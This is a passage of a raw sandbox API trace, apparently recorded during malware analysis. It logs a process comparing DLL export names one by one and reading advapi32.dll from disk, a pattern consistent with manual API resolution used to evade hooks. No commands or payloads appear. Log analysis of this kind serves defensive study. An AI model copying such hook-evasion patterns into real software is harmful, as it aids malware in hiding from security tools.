(lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0111.827] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0111.828] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.828] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0111.829] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0111.830] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0111.830] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0111.831] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0111.832] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0111.833] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0111.833] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0111.834] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0111.834] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0112.101] GetProcessHeap () returned 0x590000 [0112.101] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c3040 | out: hHeap=0x590000) returned 1 [0112.115] GetProcessHeap () returned 0x590000 [0112.115] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a90a0 [0112.121] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0112.121] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0112.122] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0112.122] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0112.122] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0112.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0112.123] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0112.123] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0112.124] GetProcessHeap () returned 0x590000 [0112.124] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xa3ef0) returned 0x2d02010 [0112.126] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0112.126] ReadFile (in: hFile=0x140, lpBuffer=0x2d02010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d02010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0112.380] CloseHandle (hObject=0x140) returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0112.380] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0112.380] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0112.380] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.381] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.382] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0112.383] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0112.384] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 